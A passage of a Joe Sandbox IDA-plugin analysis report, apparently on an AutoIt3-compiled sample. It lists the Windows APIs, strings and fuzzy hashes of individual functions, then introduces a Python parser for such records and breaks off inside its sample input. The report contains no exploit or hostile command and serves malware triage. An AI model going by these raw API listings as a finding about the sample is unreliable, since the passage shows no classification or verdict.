                                      • Part of subcall function 00885A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7896,?,?,00000000,?,?), ref: 00885A50
                                    • gethostbyname.WS2_32(?), ref: 008F6399
                                    • WSAGetLastError.WS2_32(00000000), ref: 008F63A4
                                    • _memmove.LIBCMT ref: 008F63D1
                                    • inet_ntoa.WS2_32(?), ref: 008F63DC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                    • String ID:
                                    • API String ID: 1504782959-0
                                    • Opcode ID: a46e902e7a8567f2046a457263302a4b200825b9a355045e117f5f9898ec52e3
                                    • Instruction ID: 4bb1b758ff8f58bb26781fb843f46a7e663be710948cb0977c4ee29918a296a2
                                    • Opcode Fuzzy Hash: a46e902e7a8567f2046a457263302a4b200825b9a355045e117f5f9898ec52e3
                                    • Instruction Fuzzy Hash: 45111C36500109AFCB04FBA8DD96CEEB7B8FF08314B144165F506E7261DB31AE14DB62
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 008D8B61
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D8B73
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D8B89
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D8BA4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 646dd5eaf05a82f6708a3fe4d62c5126d2db155acd658b03c0d68e22b8368c09
                                    • Instruction ID: 8c6128a74ee3ecffc00ca7e671360a36d96a6576bdd9d99b5b34225eb640276c
                                    • Opcode Fuzzy Hash: 646dd5eaf05a82f6708a3fe4d62c5126d2db155acd658b03c0d68e22b8368c09
                                    • Instruction Fuzzy Hash: 77112E79901218FFDB11DFA5CC85F9DBB74FB48710F204196E904B7250DA716E11DB94
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008DFCED,?,008E0D40,?,00008000), ref: 008E115F
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,008DFCED,?,008E0D40,?,00008000), ref: 008E1184
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008DFCED,?,008E0D40,?,00008000), ref: 008E118E
                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,008DFCED,?,008E0D40,?,00008000), ref: 008E11C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CounterPerformanceQuerySleep
                                    • String ID:
                                    • API String ID: 2875609808-0
                                    • Opcode ID: 56149466624f98abca60945f769fa6b6486d94f00c06b038e553c6e1d81e3a6c
                                    • Instruction ID: d3db14b3813dafadf56df853d693b8f92e2b46020769b89eebef5aebd0499f2a
                                    • Opcode Fuzzy Hash: 56149466624f98abca60945f769fa6b6486d94f00c06b038e553c6e1d81e3a6c
                                    • Instruction Fuzzy Hash: 78113C31D0465DEBCF149FA6D848AEEBB78FF0A751F004055EA45F2240CB709690DBD5
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 008DD84D
                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 008DD864
                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008DD879
                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 008DD897
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Type$Register$FileLoadModuleNameUser
                                    • String ID:
                                    • API String ID: 1352324309-0
                                    • Opcode ID: b869ca9879c899d0697698712ee6c095f746f60ffbdaf856f914585868b00877
                                    • Instruction ID: ff66ffdfaee6c94f24fb36dd2dd271112622576a3138da1e79f5b2fb7d38b2f3
                                    • Opcode Fuzzy Hash: b869ca9879c899d0697698712ee6c095f746f60ffbdaf856f914585868b00877
                                    • Instruction Fuzzy Hash: B8118E71605309DFE3219F50EC08F92BBBCFB00B00F108A7AA916C6650D7B0E609ABA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                    • String ID:
                                    • API String ID: 3016257755-0
                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                    • Instruction ID: 3bc1bb832ce77332a556f8e630b2262754cb3812461cb3f2a0e918fd4bb85459
                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                    • Instruction Fuzzy Hash: 8701407244864EBBCF166F88CC01CED3F62FB58354F598416FE1898231D636C9B2AB81
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 0090B2E4
                                    • ScreenToClient.USER32(?,?), ref: 0090B2FC
                                    • ScreenToClient.USER32(?,?), ref: 0090B320
                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0090B33B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClientRectScreen$InvalidateWindow
                                    • String ID:
                                    • API String ID: 357397906-0
                                    • Opcode ID: e68399fbccfdae6458dc5534cf85acf1d83348456247ad3a664c47e1ae61d109
                                    • Instruction ID: 3343d81a75a20003ed736ee01574f06641a2eeb66585089b3705a6846a62b808
                                    • Opcode Fuzzy Hash: e68399fbccfdae6458dc5534cf85acf1d83348456247ad3a664c47e1ae61d109
                                    • Instruction Fuzzy Hash: D31132B9D0420DAFDB51CFA9C8849EEBBB9FF08310F108166E914E3620D735AA559F50
                                    APIs
                                    • _memset.LIBCMT ref: 0090B644
                                    • _memset.LIBCMT ref: 0090B653
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00946F20,00946F64), ref: 0090B682
                                    • CloseHandle.KERNEL32 ref: 0090B694
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateHandleProcess
                                    • String ID:
                                    • API String ID: 3277943733-0
                                    • Opcode ID: 7fbe8baf16e83e17acd45858a8927fa613d9bc6d52cf9254e16b214339817b99
                                    • Instruction ID: 29f8722dba481a545d08b9f35920930a716f089a15a576e6c41334dce1a352d8
                                    • Opcode Fuzzy Hash: 7fbe8baf16e83e17acd45858a8927fa613d9bc6d52cf9254e16b214339817b99
                                    • Instruction Fuzzy Hash: 3DF05EF65543047EF3202B65BC06FBB3A9CEB0B795F004060BA48E5592E7724C0497AA
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 008E6BE6
                                      • Part of subcall function 008E76C4: _memset.LIBCMT ref: 008E76F9
                                    • _memmove.LIBCMT ref: 008E6C09
                                    • _memset.LIBCMT ref: 008E6C16
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 008E6C26
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                    • String ID:
                                    • API String ID: 48991266-0
                                    • Opcode ID: fa862622d0a9c1dd2e3d36fe57362408f49460f96aa116e63426e602941b15ae
                                    • Instruction ID: b2e3e52fecb15e7ffa10d9cc488784dcb95f04bc66a17dbd0655267802b4511e
                                    • Opcode Fuzzy Hash: fa862622d0a9c1dd2e3d36fe57362408f49460f96aa116e63426e602941b15ae
                                    • Instruction Fuzzy Hash: CDF05E3A204100BBCF116F99DC85A8ABB29FF46320F048061FE089E627D732E911DBB5
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 00882231
                                    • SetTextColor.GDI32(?,000000FF), ref: 0088223B
                                    • SetBkMode.GDI32(?,00000001), ref: 00882250
                                    • GetStockObject.GDI32(00000005), ref: 00882258
                                    • GetWindowDC.USER32(?,00000000), ref: 008BBE83
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 008BBE90
                                    • GetPixel.GDI32(00000000,?,00000000), ref: 008BBEA9
                                    • GetPixel.GDI32(00000000,00000000,?), ref: 008BBEC2
                                    • GetPixel.GDI32(00000000,?,?), ref: 008BBEE2
                                    • ReleaseDC.USER32(?,00000000), ref: 008BBEED
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                    • String ID:
                                    • API String ID: 1946975507-0
                                    • Opcode ID: dca6913e89b02821c8cf5b689ea0d74e123ae3c7142f0f48cc0f3d90e3f71df6
                                    • Instruction ID: 160959e9283bfc24fb8505c22c1f93271634864138f7ebb42a8c35c821fbc242
                                    • Opcode Fuzzy Hash: dca6913e89b02821c8cf5b689ea0d74e123ae3c7142f0f48cc0f3d90e3f71df6
                                    • Instruction Fuzzy Hash: D6E03932118244AEDF715F64EC0D7E83B10EB05336F008366FA69880F187B14A90EB12
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 008D871B
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,008D82E6), ref: 008D8722
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008D82E6), ref: 008D872F
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,008D82E6), ref: 008D8736
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    • Opcode ID: 4d6e4ffa7b728429bccbf41f20e703944abc514dc821944f85da3daf0eda38b0
                                    • Instruction ID: 98be24e1c9006a631811b8a0c618c8e775beec4a3b5e9e4c67a5dd5427ce4814
                                    • Opcode Fuzzy Hash: 4d6e4ffa7b728429bccbf41f20e703944abc514dc821944f85da3daf0eda38b0
                                    • Instruction Fuzzy Hash: D3E08636629211DFD7305FF45D0CB563BBCEF50BD1F148828B245D9040DA348545E750
                                    APIs
                                    • OleSetContainedObject.OLE32(?,00000001), ref: 008DB4BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ContainedObject
                                    • String ID: AutoIt3GUI$Container
                                    • API String ID: 3565006973-3941886329
                                    • Opcode ID: 89e7b8ca693b53276849e911c8d8e3c82d0dc8404f61e4c8bda9cafbe3b4c887
                                    • Instruction ID: 24af786e531910dd574d20fc510d8edf791a95b4ba1f813faaf53e770b41e4d0
                                    • Opcode Fuzzy Hash: 89e7b8ca693b53276849e911c8d8e3c82d0dc8404f61e4c8bda9cafbe3b4c887
                                    • Instruction Fuzzy Hash: 7D913870600605EFDB24DF68C884A6ABBF5FF49714F21866EE94ACB791DB70E841CB50
                                    APIs
                                      • Part of subcall function 0089FC86: _wcscpy.LIBCMT ref: 0089FCA9
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • __wcsnicmp.LIBCMT ref: 008EB02D
                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 008EB0F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                    • String ID: LPT
                                    • API String ID: 3222508074-1350329615
                                    • Opcode ID: 35352e561c454a3e9cf46976b3b09cf76253efa4e475b0acb4ebcd31ca5244b2
                                    • Instruction ID: 86e809d2f711b530cb3a5428560199754249ba050dba4c114a11084ff1cc2ae3
                                    • Opcode Fuzzy Hash: 35352e561c454a3e9cf46976b3b09cf76253efa4e475b0acb4ebcd31ca5244b2
                                    • Instruction Fuzzy Hash: 5D617F75A00219AFCB14EF99C891EAFB7B4FF09314F144069F956EB291D730AE44CB91
                                    APIs
                                    • Sleep.KERNEL32(00000000), ref: 00892968
                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00892981
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: GlobalMemorySleepStatus
                                    • String ID: @
                                    • API String ID: 2783356886-2766056989
                                    • Opcode ID: 3edde85e9f7d12905c60a1b44a0357210abb4f688997793882e194a9ad68cc18
                                    • Instruction ID: 7fd7a4dbdff868b0a030c644bcf2d0b2e2c671de1ebfc6bc92658d438c94270b
                                    • Opcode Fuzzy Hash: 3edde85e9f7d12905c60a1b44a0357210abb4f688997793882e194a9ad68cc18
                                    • Instruction Fuzzy Hash: AA5144724187449BD320EF14D886BAFBBE8FF85344F81885DF2D9810A1EB308569CB67
                                    APIs
                                      • Part of subcall function 00884F0B: __fread_nolock.LIBCMT ref: 00884F29
                                    • _wcscmp.LIBCMT ref: 008E9824
                                    • _wcscmp.LIBCMT ref: 008E9837
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _wcscmp$__fread_nolock
                                    • String ID: FILE
                                    • API String ID: 4029003684-3121273764
                                    • Opcode ID: e6721c65469260b69b23a991796ebef143034b56842e37e18792b0b102fdee11
                                    • Instruction ID: 2b8c3e8570fde601defefd5cbf201a2cf562fb2a7f43848ac22a4a8c77585de4
                                    • Opcode Fuzzy Hash: e6721c65469260b69b23a991796ebef143034b56842e37e18792b0b102fdee11
                                    • Instruction Fuzzy Hash: 2941A772A0025ABADF20AAA5CC45FEFB7B9FF86714F000479F904E7191DAB199048B61
                                    APIs
                                    • _memset.LIBCMT ref: 008F259E
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008F25D4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CrackInternet_memset
                                    • String ID: |
                                    • API String ID: 1413715105-2343686810
                                    • Opcode ID: 7cdac23ba206c319908b5f545af0e0e243e30583b7cf790d0e74bb4d0dfcbb77
                                    • Instruction ID: 7b92d0e55a17e270c614b32a982da7f6c01ce2cddbaa9749f11b57a7158e024f
                                    • Opcode Fuzzy Hash: 7cdac23ba206c319908b5f545af0e0e243e30583b7cf790d0e74bb4d0dfcbb77
                                    • Instruction Fuzzy Hash: AB310571804119EBCF11EFA8CC85EEEBFB8FF18310F100069F915E6162EA359A56DB61
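The records above are the Joe Sandbox IDA plugin's per-function summaries: the imported APIs a function calls (with the arguments the plugin could resolve and the call-site address), the strings it references, and the Opcode ID / Instruction Fuzzy Hash that identify the function for cross-sample similarity. When working through hundreds of these it helps to turn the flattened text into structured records and search them by API. The following Python parser is an added example, not Joe Sandbox's code and not part of this report; its sample input is three records copied from this page (the OpenProcessToken, WNetUseConnectionW and InternetCrackUrlW functions), and the watchlist groups and their names are the author's own illustrative assumptions.

```python
"""Parse the per-function 'APIs / Similarity' records that the Joe Sandbox
IDA plugin emits (as flattened on this page) and tag functions by the APIs
they call. Added example, not Joe Sandbox code; the watchlist is illustrative."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: three records copied from the report above, in the
# page's flattened text form (bullets and indentation vary as on the page).
SAMPLE = """\
APIs
• GetCurrentThread.KERNEL32 ref: 008D871B
• OpenThreadToken.ADVAPI32(00000000,?,?,?,008D82E6), ref: 008D8722
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008D82E6), ref: 008D872F
• OpenProcessToken.ADVAPI32(00000000,?,?,?,008D82E6), ref: 008D8736
Memory Dump Source
• Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: 4d6e4ffa7b728429bccbf41f20e703944abc514dc821944f85da3daf0eda38b0
• Instruction Fuzzy Hash: D3E08636629211DFD7305FF45D0CB563BBCEF50BD1F148828B245D9040DA348545E750
APIs
  • Part of subcall function 0089FC86: _wcscpy.LIBCMT ref: 0089FCA9
  • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
  • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
• __wcsnicmp.LIBCMT ref: 008EB02D
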